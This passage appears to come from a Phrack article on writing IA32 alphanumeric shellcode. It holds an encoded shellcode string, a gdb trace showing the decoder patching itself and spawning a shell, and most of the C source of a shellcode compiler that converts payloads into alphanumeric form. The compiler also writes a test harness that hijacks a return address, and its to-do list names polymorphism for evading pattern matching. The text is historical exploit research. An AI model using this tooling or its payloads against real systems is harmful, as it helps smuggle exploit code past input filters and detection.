+Dfh7VDfhhvDTY01fh22fXf5m5fPDfh3VDfhWvDTY09fhKzfXf5vWfPDTY01fhe3Dfh8qfXf5f \
+zfPfhRvDTY09fhXXfXf5HFfPDfh0rDTY01fhk5fXf5OkfPfhwPfXf57DfPDTY09fhz3DTY09S \
+QSUSFVDNfhiADTY09WRa0tkbfhUCfXf1Dkcf1tkc3UX
+ Writing alpha.c ...
+ Done.
+ 
+ rix@debian:~/phrack$ gcc -o alpha alpha.c 
+ rix@debian:~/phrack$ gdb alpha
+ GNU gdb 19990928
+ Copyright 1998 Free Software Foundation, Inc.
+ GDB is free software, covered by the GNU General Public License, and you are
+ welcome to change it and/or distribute copies of it under certain conditions.
+ Type "show copying" to see the conditions.
+ There is absolutely no warranty for GDB.  Type "show warranty" for details.
+ This GDB was configured as "i686-pc-linux-gnu"...
+ (no debugging symbols found)... 
+ (gdb) run
+ Starting program: /home/rix/phrack/alpha
+ (no debugging symbols found)...(no debugging symbols found)...
+ Program received signal SIGTRAP, Trace/breakpoint trap.
+ 0xbffffb1d in ?? ()                          ;-debug-build-jump 
+ (gdb) x/22i 0xbffffb1d
+ 0xbffffb1d:     push   %ebx
+ 0xbffffb1e:     push   %ecx
+ 0xbffffb1f:     push   %ebx                  ;EDX will contain 0xFFFFFFFF
+ 0xbffffb20:     push   %ebp
+ 0xbffffb21:     push   %ebx
+ 0xbffffb22:     inc    %esi                  ;ESI contains 0xFFFFFFFF.
+ 0xbffffb23:     push   %esi                  ;ESI contains 0.
+ 0xbffffb24:     inc    %esp                  ;00 00 00 on the stack.
+ 0xbffffb25:     dec    %esi                  ;restores ESI.
+ 0xbffffb26:     pushw  $0x4169               ;push an alphanumeric word.
+ 0xbffffb2a:     inc    %esp                  ;an alphanumeric byte on the
+                                              ; stack.
+ 0xbffffb2b:     push   %esp
+ 0xbffffb2c:     pop    %ecx                  ;ECX contains ESP (the
+                                              ; address of the byte).
+ 0xbffffb2d:     xor    %bh,(%ecx)            ;NOT on this byte (EBP will
+                                              ; contain the dword offset).
+ 0xbffffb2f:     push   %edi                  ;ESI will contain 0xFFFFFFFF
+ 0xbffffb30:     push   %edx
+ 0xbffffb31:     popa
+ 0xbffffb32:     xor    %dh,0x62(%ebx,%ebp,2) ;NOT on the first byte to
+                                              ; patch (our 0xCC, int3).
+                                              ; Let's note the use of
+                                              ; alphanumeric <disp8>, the
+                                              ; use of EBX (address of our
+                                              ; shellcode) and the use of
+                                              ; EBP (the previously stored
+                                              ; offset).
+ 0xbffffb36:     pushw  $0x4355
+ 0xbffffb3a:     pop    %ax                   ;AX contains 0x4355.
+ 0xbffffb3c:     xor    %ax,0x63(%ebx,%ebp,2) ;XOR the next 2 bytes
+                                              ; (<disp8> is now 0x63).
+ 0xbffffb41:     xor    %si,0x63(%ebx,%ebp,2) ;NOT these 2 bytes. 
+ (gdb) x/3bx 0xbffffb41+5                     ;O16 + XOR + ModR/M +
+                                              ; SIB + <disp8> = 5 bytes
+ 0xbffffb46:     0x33    0x55    0x58         ;The 3 bytes we patched:
+                                              ; NOT 0x33 = 0xCC => INT 3
+                                              ; NOT (0x55 XOR 0x55) = 0xFF
+                                              ; NOT (0x43 XOR 0x58) = 0xE4
+                                              ;  => JMP ESP
+ (gdb) cont
+ Continuing.
+
+ Program received signal SIGTRAP, Trace/breakpoint trap.
+ 0xbffffb47 in ?? ()                          ;-debug-jump
+ (gdb) x/1i 0xbffffb47
+ 0xbffffb47:     jmp    *%esp                 ;our jump
+ (gdb) info reg esp
+ esp            0xbffffd41       -1073742527
+ (gdb) cont                                   ;Let's run this JMP ESP.
+ Continuing.
+
+ Program received signal SIGTRAP, Trace/breakpoint trap.
+ 0xbffffd42 in ?? ()                          ;(previous ESP)+1
+                                              ; (because of our INT3). We
+                                              ; are now in our original
+                                              ; shellcode.
+ (gdb) cont                                   ;Let's run it ;)
+ Continuing.
+ sh-2.03$ exit                                ;Finally!!!
+ exit
+ (no debugging symbols found)...(no debugging symbols found)...
+ Program exited normally.
+ (gdb)
+
+
+
+----| Conclusion
+
+
+Writing IA32 alphanumeric shellcodes is finally easily possible. But using
+only alphanumeric addresses is less obvious. In fact, this is the main
+problem met when we simply want to use alphanumeric chars.
+
+In some particular cases, it will however be possible. We'll try to return
+to instructions that will themselves return to our shellcode. For example,
+on Win32 systems, we can sometimes meet interesting instructions at
+addresses like 0x0041XXXX (XX are alphanumeric chars). So we can generate
+such return addresses.
+Partial overwriting of addresses is sometimes also interesting, because we
+can take advantage of bytes already present on the stack, and mainly take
+advantage of the null byte (that we cannot generate), automatically copied
+at the end of the C string.
+Note that, sometimes, depending on what we try to exploit, we can use some
+others chars, for example '_', '@', '-' or such classical characters. It
+is obvious, in such cases, that they will be very precious.
+
+
+The "stack technique" seems to need an executable stack... But we can
+modify ESP's value at the beginning of our shellcode, and get it point to
+our heap, for example. Our original shellcode will then be written to the
+heap. However, we need to patch the POP ESP instruction, because it's not
+"alphanumeric compliant".
+
+
+Except, the size (it will possibly lead to some problems), we also must
+mention another disadvantages of those techniques: compiled shellcodes
+are vulnerable to toupper()/tolower() conversions. Writing an alphanumeric
+and toupper()/tolower() resistant shellcode is nearly an impossible task
+(remember the first array, with usable instructions).
+
+
+This paper shows that, contrary to received ideas, an executable code can
+be written, and stored nearly everywhere. Never trust anymore a string
+that looks perfectly legal: perhaps is it a well disguised shellcode ;)
+
+
+Thanks and Hello to (people are alphanumerically ordered :p ):
+- Phrack staff.
+- Devhell, HERT & TESO guys: particularly analyst, binf, gaius, mayhem,
+   klog, kraken & skyper.
+- dageshi, eddow, lrz, neuro, nite, obscurer, tsychrana.
+                                                              rix@hert.org
+
+
+----| Code
+
+This should compile fine on any Linux box with "gcc -o asc asc.c".
+It is distributed under the terms of the GNU GENERAL PUBLIC LICENSE.
+If you have problems or comments, feel free to contact me (rix@hert.org).
+
+<++> asc.c !707307fc
+/******************************************************************************
+ *                ASC : IA 32 Alphanumeric Shellcode Compiler                 *
+ ******************************************************************************
+ *
+ * VERSION: 0.9.1
+ *
+ *
+ * LAST UPDATE: Fri Jul 27 19:42:08 CEST 2001
+ *
+ *
+ * LICENSE:
+ *  ASC - Alphanumeric Shellcode Compiler
+ *
+ *  Copyright 2000,2001 - rix
+ *
+ *  All rights reserved.
+ *
+ *  Redistribution and use in source and binary forms, with or without
+ *  modification, are permitted provided that the following conditions
+ *  are met:
+ *  1. Redistributions of source code must retain the above copyright
+ *     notice, this list of conditions and the following disclaimer.
+ *  2. Redistributions in binary form must reproduce the above copyright
+ *     notice, this list of conditions and the following disclaimer in the
+ *     documentation and/or other materials provided with the distribution.
+ *
+ *  THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ *  ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ *  IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ *  ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ *  FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ *  DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ *  OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ *  HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ *  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ *  OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ *  SUCH DAMAGE.
+ *
+ *
+ * TODO:
+ *  - create LibASC, a library containing all functions.
+ *  - permit specification of acceptable non-alphanumeric chars.
+ *  - generate padding instructions sequences.
+ *  - encode alphanumeric chars, to avoid pattern matching.
+ *  - insert junk instructions (polymorphic stuff) and modify existing.
+ *  - optimize "patch technique" when offset < 256 and is alphanumeric.
+ *  - automatically calculate padding size for "stack without jump" technique.
+ *  - C output format: simulate addresses in register, padding,...
+ *  - use constant address for compiled shellcode.
+ *  - modify ESP starting address for "stack technique".
+ *  - simple shellcode formats conversion mode (no compilation).
+ *  - insert spaces and punctuation to imitate classical sentences.
+ *
+ *
+ * CONTACT: rix <rix@hert.org>
+ *
+ ******************************************************************************/
+
+#include <stdio.h>
+#include <getopt.h>
+#include <stdarg.h>
+#include <string.h>
+#include <time.h>
+
+/* +------------------------------------------------------------------------+ */
+/* |                       RANDOM NUMBERS FUNCTIONS                         | */
+/* +------------------------------------------------------------------------+ */
+
+/* initialize the pseudo-random numbers generator */
+/* ============================================== */
+void random_initialize() {
+ srand((unsigned int)time(0));
+}
+
+
+/* get a random integer i (0<=i<max) */
+/* ================================= */
+int random_get_int(int max) {
+ return (rand()%max);
+}
+
+/* +------------------------------------------------------------------------+ */
+/* |                         SHELLCODES FUNCTIONS                           | */
+/* +------------------------------------------------------------------------+ */
+
+/* this structure will contain all our shellcodes */
+/* ============================================== */
+struct Sshellcode {
+ unsigned char* opcodes; /* opcodes bytes */
+ int size; /* size of the opcodes bytes */
+};
+
+
+/* allocate a new Sshellcode structure */
+/* =================================== */
+struct Sshellcode *shellcode_malloc() {
+ struct Sshellcode *ret;
+
+ if ((ret=(struct Sshellcode*)malloc(sizeof(struct Sshellcode)))!=NULL) {
+  ret->opcodes=NULL;
+  ret->size=0;
+ }
+ return ret;
+}
+
+
+/* initialize an existing Sshellcode structure */
+/* =========================================== */
+void shellcode_zero(struct Sshellcode *shellcode) {
+ if (shellcode==NULL) return;
+
+ if (shellcode->opcodes!=NULL) free(shellcode->opcodes);
+ shellcode->opcodes=NULL;
+ shellcode->size=0;
+}
+
+
+/* free an existing Sshellcode structure */
+/* ===================================== */
+void shellcode_free(struct Sshellcode *shellcode) {
+ if (shellcode!=NULL) {
+  shellcode_zero(shellcode);
+  free(shellcode);
+ }
+}
+
+
+/* return an allocated string from an existing Sshellcode */
+/* ====================================================== */
+char *shellcode_malloc_string(struct Sshellcode *shellcode) {
+ char *ret;
+
+ if (shellcode==NULL) return NULL;
+
+ if (shellcode->opcodes==NULL) return "";
+
+ if ((ret=(char*)malloc(shellcode->size+1))==NULL) return NULL;
+ memcpy(ret,shellcode->opcodes,shellcode->size);
+ ret[shellcode->size]=0;
+ return ret;
+}
+
+
+/* overwrite an existing Sshellcode with a Sshellcode */
+/* ================================================== */
+struct Sshellcode *shellcode_cpy(struct Sshellcode *destination,struct Sshellcode *source) {
+ if (destination==NULL) return NULL;
+
+ shellcode_zero(destination);
+
+ if (source!=NULL) {
+  if (source->opcodes!=NULL) { /* if source contains a shellcode, we copy it */
+   if ((destination->opcodes=(unsigned char*)malloc(source->size))==NULL) return NULL;
+   memcpy(destination->opcodes,source->opcodes,source->size);
+   destination->size=source->size;
+  }
+ }
+
+ return destination;
+}
+
+
+/* append a Sshellcode at the end of an existing Sshellcode */
+/* ======================================================== */
+struct Sshellcode *shellcode_cat(struct Sshellcode *destination,struct Sshellcode *source) {
+ if (destination==NULL) return NULL;
+
+ if (destination->opcodes==NULL) shellcode_cpy(destination,source);
+ else { /* destination already contains a shellcode */
+
+  if (source!=NULL) {
+   if (source->opcodes!=NULL) { /* if source contain a shellcode, we copy it */
+
+    if ((destination->opcodes=(unsigned char*)realloc(destination->opcodes,
+         destination->size+source->size))==NULL) return NULL;
+    memcpy(destination->opcodes+destination->size,source->opcodes,source->size);
+    destination->size+=source->size;
+   }
+  }
+ }
+ return destination;
+}
+
+
+/* add a byte at the end of an existing Sshellcode */
+/* =============================================== */
+struct Sshellcode *shellcode_db(struct Sshellcode *destination,unsigned char c) {
+ struct Sshellcode *ret,*tmp;
+
+ /* build a tiny one byte Sshellcode */
+ tmp=shellcode_malloc();
+ if ((tmp->opcodes=(unsigned char*)malloc(1))==NULL) return NULL;
+ tmp->opcodes[0]=c;
+ tmp->size=1;
+
+ /* copy it at the end of the existing Sshellcode */
+ ret=shellcode_cat(destination,tmp);
+ shellcode_free(tmp);
+ return ret;
+}
+
+
+/* read a Sshellcode from a binary file */
+/* ==================================== */
+int shellcode_read_binary(struct Sshellcode *shellcode,char *filename) {
+ FILE *f;
+ int size;
+
+ if (shellcode==NULL) return -1;
+
+ if ((f=fopen(filename,"r+b"))==NULL) return -1;
+
+ fseek(f,0,SEEK_END);
+ size=(int)ftell(f);
+ fseek(f,0,SEEK_SET);
+
+ if ((shellcode->opcodes=(unsigned char*)realloc(shellcode->opcodes,shellcode->size+size))==NULL) return -1;
+ if (fread(shellcode->opcodes+shellcode->size,size,1,f)!=1) {
+  shellcode_zero(shellcode);
+  return -1;
+ }
+ shellcode->size+=size;
+ fclose(f);
+ return shellcode->size;
+}
+
+
+/* read a Sshellcode from a C file */
+/* =============================== */
+#define LINE_SIZE 80*256
+#define HEXADECIMALS "0123456789ABCDEF"
+
+int shellcode_read_C(struct Sshellcode *shellcode,char *filename,char *variable) {
+ FILE *f;
+ struct Sshellcode *binary;
+ unsigned char *hex,*p,c;
+ int i;
+
+ if (shellcode==NULL) return -1;
+
+ hex=HEXADECIMALS;
+ binary=shellcode_malloc();
+ if (shellcode_read_binary(binary,filename)==-1) {
+  shellcode_free(binary);
+  return -1;
+ }
+ shellcode_db(binary,0); /* for string searching */
+ p=binary->opcodes;
+
+ while (p=strstr(p,"char ")) { /* "char " founded */
+  p+=5;
+  while (*p==' ') p++;
+  if (!variable) { /* if no variable was specified */
+   while ((*p!=0)&&(*p!='[')) p++; /* search for the '[' */
+   if (*p==0) {
+   shellcode_free(binary);
+    return -1;
+   }
+  }
+  else { /* a variable was specified */
+   if (memcmp(p,variable,strlen(variable))) continue; /* compare the variable */
+   p+=strlen(variable);
+   if (*p!='[') continue;
+  }
+  /* *p='[' */
+  p++;
+  if (*p!=']') continue;
+  /* *p=']' */
+  p++;
+  while ((*p==' ')||(*p=='\r')||(*p=='\n')||(*p=='\t')) p++;
+  if (*p!='=') continue;
+  /* *p='=' */
+  p++;
+  while (1) { /* search for the beginning of a "string" */
+   while ((*p==' ')||(*p=='\r')||(*p=='\n')||(*p=='\t')) p++;
+
+   while ((*p=='/')&&(*(p+1)=='*')) { /* loop until the beginning of a comment */
+    p+=2;
+    while ((*p!='*')||(*(p+1)!='/')) p++; /* search for the end of the comment */
+    p+=2;
+    while ((*p==' ')||(*p=='\r')||(*p=='\n')||(*p=='\t')) p++;
+   }
+
+   if (*p!='"') break; /* if this is the end of all "string" */
+   /* *p=begin '"' */
+   p++;
+   while (*p!='"') { /* loop until the end of the "string" */
+    if (*p!='\\') {
+     shellcode_db(shellcode,*p);
+    }
+    else {
+     /* *p='\' */
+     p++;
+     if (*p=='x') {
+      /* *p='x' */
+      p++;
+      *p=toupper(*p);
+      for (i=0;i<strlen(hex);i++) if (hex[i]==*p) c=i<<4; /* first digit */
+      p++;
+      *p=toupper(*p);
+      for (i=0;i<strlen(hex);i++) if (hex[i]==*p) c=c|i; /* second digit */
+      shellcode_db(shellcode,c); 
+     }  
+    }
+    p++;
+   }
+   /* end of a "string" */
+   p++;
+  }
+  /* end of all "string" */
+  shellcode_free(binary);
+  return shellcode->size;
+ }
+ shellcode_free(binary);
+ return -1;
+}
+
+
+/* write a Sshellcode to a binary file */
+/* =================================== */
+int shellcode_write_binary(struct Sshellcode *shellcode,char *filename) {
+ FILE *f;
+
+ if (shellcode==NULL) return -1;
+
+ if ((f=fopen(filename,"w+b"))==NULL) return -1;
+
+ if (fwrite(shellcode->opcodes,shellcode->size,1,f)!=1) return -1;
+ fclose(f);
+ return shellcode->size;
+}
+
+
+/* write a Sshellcode to a C file */
+/* ============================== */
+int shellcode_write_C(struct Sshellcode *shellcode,char *filename) {
+ FILE *f;
+ char *tmp;
+ int size;
+
+ if (shellcode==NULL) return -1;
+
+ if ((tmp=shellcode_malloc_string(shellcode))==NULL) return -1;
+
+ if ((f=fopen(filename,"w+b"))==NULL) return -1; 
+
+ fprintf(f,"char shellcode[]=\"%s\";\n",tmp);
+ free(tmp);
+ fprintf(f,"\n");
+ fprintf(f,"int main(int argc, char **argv) {\n");
+ fprintf(f," int *ret;\n");
+
+ size=1;
+ while (shellcode->size*2>size) size*=2;
+
+ fprintf(f," char buffer[%d];\n",size);
+ fprintf(f,"\n");
+ fprintf(f," strcpy(buffer,shellcode);\n");
+ fprintf(f," ret=(int*)&ret+2;\n");
+ fprintf(f," (*ret)=(int)buffer;\n");
+ fprintf(f,"}\n");
+
+ fclose(f);
+ return shellcode->size;
+}
+
+
+/* print a Sshellcode on the screen */
+/* ================================ */
+int shellcode_print(struct Sshellcode *shellcode) {
+ char *tmp;
+
+ if (shellcode==NULL) return -1;
+
+ if ((tmp=shellcode_malloc_string(shellcode))==NULL) return -1;
+ printf("%s",tmp);
+ free(tmp);
+ return shellcode->size;
+}
+
+/* +------------------------------------------------------------------------+ */
+/* |                        IA32 MACROS DEFINITIONS                         | */
+/* +------------------------------------------------------------------------+ */
+
+/* usefull macro definitions */
+/* ========================= */
+/*
+ SYNTAX:
+  r=register
+  d=dword
+  w=word
+  b,b1,b2,b3,b4=bytes
+  n=integer index
+  s=Sshellcode
+*/
+
+/* registers */
+#define EAX 0
+#define EBX 3
+#define ECX 1
+#define EDX 2
+#define ESI 6
+#define EDI 7
+#define ESP 4
+#define EBP 5
+#define REGISTERS 8
+
+/* boolean operators (bytes) */
+#define XOR(b1,b2) (((b1&~b2)|(~b1&b2))&0xFF)
+#define NOT(b) ((~b)&0xFF)
+
+/* type constructors */
+#define DWORD(b1,b2,b3,b4) ((b1<<24)|(b2<<16)|(b3<<8)|b4) /* 0xb1b2b3b4 */
+#define WORD(b1,b2) ((b1<<8)|b2) /* 0xb1b2 */
+
+/* type extractors  (0=higher 3=lower) */
+#define BYTE(d,n) ((d>>(n*8))&0xFF) /* get n(0-3) byte from (d)word d */
+
+
+/* IA32 alphanumeric instructions definitions */
+/* ========================================== */
+
+#define DB(s,b) shellcode_db(s,b);
+
+/* dw b1 b2 */
+#define DW(s,w)  \
+ DB(s,BYTE(w,0)) \
+ DB(s,BYTE(w,1)) \
+
+/* dd b1 b2 b3 b4 */
+#define DD(s,d)  \
+ DB(s,BYTE(d,0)) \
+ DB(s,BYTE(d,1)) \
+ DB(s,BYTE(d,2)) \
+ DB(s,BYTE(d,3)) \
+
+#define XOR_ECX_DH(s) \
+ DB(s,'0')            \
+ DB(s,'1')            \
+
+#define XOR_ECX_BH(s) \
+ DB(s,'0')            \
+ DB(s,'9')            \
+
+#define XOR_ECX_ESI(s) \
+ DB(s,'1')             \
+ DB(s,'1')             \
+
+#define XOR_ECX_EDI(s) \
+ DB(s,'1')             \
+ DB(s,'9')             \
+
+// xor [base+2*index+disp8],r8
+#define XORsib8(s,base,index,disp8,r8) \
+ DB(s,'0')                             \
+ DB(s,(01<<6|r8   <<3|4   ))           \
+ DB(s,(01<<6|index<<3|base))           \
+ DB(s,disp8)                           \
+
+// xor [base+2*index+disp8],r32
+#define XORsib32(s,base,index,disp8,r32) \
+ DB(s,'1')                               \
+ DB(s,(01<<6|r32  <<3|4   ))             \
+ DB(s,(01<<6|index<<3|base))             \
+ DB(s,disp8)                             \
+
+#define XOR_AL(s,b) \
+ DB(s,'4')          \
+ DB(s,b)            \
+
+#define XOR_AX(s,w) \
+ O16(s)             \
+ DB(s,'5')          \
+ DW(s,w)            \
+
+#define XOR_EAX(s,d) \
+ DB(s,'5')           \
+ DD(s,d)             \
+
+#define INCr(s,r) DB(s,('A'-1)|r)
+#define DECr(s,r) DB(s,'H'|r)
+#define PUSHr(s,r) DB(s,'P'|r)
+#define POPr(s,r) DB(s,'X'|r)
+#define POPAD(s) DB(s,'a')
+#define O16(s) DB(s,'f')
+
+#define PUSHd(s,d) \
+ DB(s,'h')         \
+ DD(s,d)           \
+
+#define PUSHw(s,w) \
+ O16(s)            \
+ DB(s,'h')         \
+ DW(s,w)           \
+
+#define PUSHb(s,b) \
+ DB(s,'j')         \
+ DB(s,b)           \
+
+#define INT3(s) \
+ DB(s,'\xCC')   \
+
+#define CALL_ESP(s) \
+ DB(s,'\xFF')       \
+ DB(s,'\xD4')       \
+
+#define JMP_ESP(s) \
+ DB(s,'\xFF')      \
+ DB(s,'\xE4')      \
+
+#define RET(s) \
+ DB(s,'\xC3')  \
+
+/* +------------------------------------------------------------------------+ */
+/* |                    ALPHANUMERIC MANIPULATIONS FUNCTIONS                | */
+/* +------------------------------------------------------------------------+ */
+
+#define ALPHANUMERIC_BYTES "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMOPQRSTUVWXYZ"
+
+/* return 1 if the byte is alphanumeric */
+/* ==================================== */
+int alphanumeric_check(unsigned char c) {
+ if (c<'0') return 0;
+ else if (c<='9') return 1;
+ else if (c<'A') return 0;
+ else if (c<='Z') return 1;
+ else if (c<'a') return 0;
+ else if (c<='z') return 1;
+ else return 0;
+}
+
+
+/* return a random alphanumeric byte */
+/* ================================= */
+unsigned char alphanumeric_get_byte() {
+ unsigned char *bytes=ALPHANUMERIC_BYTES;
+
+ return bytes[random_get_int(strlen(bytes))];
+}
+
+
+/* return a random alphanumeric byte b (c=CATEGORY_XOR,(b XOR(b XOR c))) */
+/* ===================================================================== */
+unsigned char alphanumeric_get_complement(unsigned char c) {
+ unsigned char ret;
+
+ while (1) {
+  ret=alphanumeric_get_byte();
+  if (alphanumeric_check(XOR(c,ret))) return ret;
+ }
+}
+
+/* +------------------------------------------------------------------------+ */
+/* |                      REGISTERS MANIPULATIONS FUNCTIONS                 | */
+/* +------------------------------------------------------------------------+ */
+
+/* return a random register in a set of allowed registers */
+/* ====================================================== */
+#define M_EAX (1<<EAX)
+#define M_EBX (1<<EBX)
+#define M_ECX (1<<ECX)
+#define M_EDX (1<<EDX)
+#define M_ESI (1<<ESI)
+#define M_EDI (1<<EDI)
+#define M_ESP (1<<ESP)
+#define M_EBP (1<<EBP)
+#define M_REGISTERS (M_EAX|M_EBX|M_ECX|M_EDX|M_ESI|M_EDI|M_ESP|M_EBP)
+
+int alphanumeric_get_register(int mask) {
+ int regs[REGISTERS];
+ int size,i;
+
+ size=0;
+ for (i=0;i<REGISTERS;i++) { /* for all possible registers */
+  if (mask&(1<<i)) regs[size++]=i; /* add the register if it is in our mask */
+ }
+ return regs[random_get_int(size)];
+}
+
+
+/* return a "POPable" register (ECX|EDX) with the shellcode's base address using the return address on the stack */
+/* ============================================================================================================= */
+int alphanumeric_get_address_stack(struct Sshellcode *s) {
+ unsigned char ret;
+
+ if (s==NULL) return -1;
+
+ DECr(s,ESP); /* dec esp */
+ DECr(s,ESP); /* dec esp */
+ DECr(s,ESP); /* dec esp */
+ DECr(s,ESP); /* dec esp */
+ ret=alphanumeric_get_register(M_ECX|M_EDX); /* get a random register */
+ POPr(s,ret); /* pop ecx/edx =>pop the return value from the stack */
+ return ret;
+}
+
+
+/* initialize registers (reg=shellcode's base address) */
+/* =================================================== */
+int alphanumeric_initialize_registers(struct Sshellcode *s,unsigned char reg) {
+ unsigned char b[4];
+ int i;
+
+ if (s==NULL) return -1;
+
+ if (reg==EAX) {
+  PUSHr(s,EAX);                                   /* push eax =>address */
+  reg=alphanumeric_get_register(M_ECX|M_EDX); /* get a random register */
+  POPr(s,reg);                                    /* pop ecx/edx */
+ }
+ for (i=0;i<4;i++) b[i]=alphanumeric_get_byte(); /* get a random alphanumeric dword */
+ PUSHd(s,DWORD(b[0],b[1],b[2],b[3]));             /* push '????' */
+ POPr(s,EAX);                                     /* pop eax */ 
+ XOR_EAX(s,DWORD(b[0],b[1],b[2],b[3]));           /* xor eax,'????' =>EAX=0 */
+ DECr(s,EAX);                                     /* dec eax  =>EAX=FFFFFFFF */
+ PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>EAX */
+ PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>ECX */
+ PUSHr(s,EAX);                                    /* push eax =>EDX=FFFFFFFF */
+ PUSHr(s,EAX);                                    /* push eax =>EBX=FFFFFFFF */
+ PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>ESP */
+ PUSHr(s,reg);                                    /* push reg =>EBP=address */
+ PUSHr(s,EAX);                                    /* push eax =>ESI=FFFFFFFF */
+ PUSHr(s,EAX);                                    /* push eax =>EDI=FFFFFFFF */
+ POPAD(s);                                        /* popad */
+ return 0;
+}
+
+/* +------------------------------------------------------------------------+ */
+/* |                        STACK MANIPULATIONS FUNCTIONS                   | */
+/* +------------------------------------------------------------------------+ */
+
+/* return the category of the byte */
+/* =============================== */
+#define CATEGORY_NULL 0
+#define CATEGORY_00 1
+#define CATEGORY_FF 2
+#define CATEGORY_ALPHA 3
+#define CATEGORY_ALPHA_NOT 4
+#define CATEGORY_XOR 5
+#define CATEGORY_XOR_NOT 6
+
+int alphanumeric_stack_get_category(unsigned char c) {
+ if (c==0) return CATEGORY_00;
+ else if (c==0xFF) return CATEGORY_FF;
+ else if (alphanumeric_check(c)) return CATEGORY_ALPHA;
+ else if (c<0x80) return CATEGORY_XOR;
+ else { /* need a NOT */
+  c=NOT(c);
+  if (alphanumeric_check(c)) return CATEGORY_ALPHA_NOT;
+  else return CATEGORY_XOR_NOT;
+ }
+}
+
+
+/* make a NOT on 1,2,3 or 4 bytes on the stack */
+/* =========================================== */
+int alphanumeric_stack_generate_not(struct Sshellcode *s,int size) {
+ if (s==NULL) return -1;
+
+ PUSHr(s,ESP); /* push esp */
+ POPr(s,ECX);  /* pop ecx */
+
+ switch(size) {
+ case 1:
+  if (alphanumeric_get_register(M_EDX|M_EBX)==EDX) {
+   XOR_ECX_DH(s); /* xor [ecx],dh */
+  }
+  else {
+   XOR_ECX_BH(s); /* xor [ecx],bh */
+  }
+  break;
+
+ case 2:
+  if (alphanumeric_get_register(M_ESI|M_EDI)==ESI) {
+   O16(s);XOR_ECX_ESI(s); /* xor [ecx],si */
+  }
+  else {
+   O16(s);XOR_ECX_EDI(s); /* xor [ecx],di */
+  }
+  break;
+
+ case 3:
+  DECr(s,ECX);     /* dec ecx */
+ case 4:
+  if (alphanumeric_get_register(M_ESI|M_EDI)==ESI) {
+   XOR_ECX_ESI(s); /* xor [ecx],esi */
+  }
+  else {
+   XOR_ECX_EDI(s); /* xor [ecx],edi */
+  }
+  break;
+ }
+ return 0;
+}
+
+
+/* generate 1,2,3 or 4 bytes from a category on the stack */
+/* ====================================================== */
+#define SB1 b[size-1]
+#define SB2 b[size-2]
+#define SB3 b[size-3]
+#define SB4 b[size-4]
+
+int alphanumeric_stack_generate_push(struct Sshellcode *s,int category,unsigned char *bytes,int size) {
+ int reg,i;
+ unsigned char b[4];
+ unsigned char xSB1,xSB2,xSB3,xSB4;
+
+ if (s==NULL) return -1;
+
+ memcpy(b,bytes,4);
+
+ /* possibly realize a NOT on b[] */
+ if ((category==CATEGORY_ALPHA_NOT)||(category==CATEGORY_XOR_NOT)) {
+  for (i=0;i<size;i++) b[i]=NOT(b[i]);
+ }
+
+ /* generate bytes on the stack */
+ switch(category) {
+ case CATEGORY_00:
+ case CATEGORY_FF:
+  reg=alphanumeric_get_register(M_EDX|M_EBX|M_ESI|M_EDI);
+  if (category==CATEGORY_00) INCr(s,reg); /* inc r16 =>r16=0*/
+  switch(size) {
+  case 1:
+   O16(s);PUSHr(s,reg); /* push r16 */
+   INCr(s,ESP);         /* inc esp */
+   break;
+  case 2:
+   O16(s);PUSHr(s,reg); /* push r16 */
+   break;
+  case 3:
+   PUSHr(s,reg); /* push r32 */
+   INCr(s,ESP);  /* inc esp */
+   break;
+  case 4:
+   PUSHr(s,reg); /* push r32 */
+   break;
+  }
+  if (category==CATEGORY_00) DECr(s,reg); /* dec r16 =>r16=FFFFFFFF */
+  break;
+
+ case CATEGORY_ALPHA:
+ case CATEGORY_ALPHA_NOT:
+  switch(size) {
+  case 1:
+   PUSHw(s,WORD(SB1,alphanumeric_get_byte())); /* push SB1 */
+   INCr(s,ESP);                                /* inc esp */
+   break;
+  case 2:
+   PUSHw(s,WORD(SB1,SB2)); /* push SB1 SB2 */
+   break;
+  case 3:
+   PUSHd(s,DWORD(SB1,SB2,SB3,alphanumeric_get_byte())); /* push SB1 SB2 SB3 */
+   INCr(s,ESP);                                         /* inc esp */
+   break;
+  case 4:
+   PUSHd(s,DWORD(SB1,SB2,SB3,SB4)); /* push SB1 SB2 SB3 SB4 */
+   break;
+  }
+  break;
+
+ case CATEGORY_XOR:
+ case CATEGORY_XOR_NOT:
+  switch(size) {
+  case 1:
+   xSB1=alphanumeric_get_complement(SB1);
+   PUSHw(s,WORD(XOR(SB1,xSB1),alphanumeric_get_byte())); /* push ~xSB1 */
+   O16(s);POPr(s,EAX);                           /* pop ax */
+   XOR_AX(s,WORD(xSB1,alphanumeric_get_byte())); /* xor ax,xSB1 =>EAX=SB1 */
+   O16(s);PUSHr(s,EAX);                          /* push ax */
+   INCr(s,ESP);                                  /* inc esp */
+   break;
+  case 2:
+   xSB1=alphanumeric_get_complement(SB1);
+   xSB2=alphanumeric_get_complement(SB2);
+   PUSHw(s,WORD(XOR(SB1,xSB1),XOR(SB2,xSB2))); /* push ~xSB1 ~xSB2 */
+   O16(s);POPr(s,EAX);        /* pop ax */
+   XOR_AX(s,WORD(xSB1,xSB2)); /* xor ax,xSB1 xSB2 =>EAX=SB1 SB2 */
+   O16(s);PUSHr(s,EAX);       /* push ax */
+   break;
+  case 3:
+   xSB1=alphanumeric_get_complement(SB1);
+   xSB2=alphanumeric_get_complement(SB2);
+   xSB3=alphanumeric_get_complement(SB3);
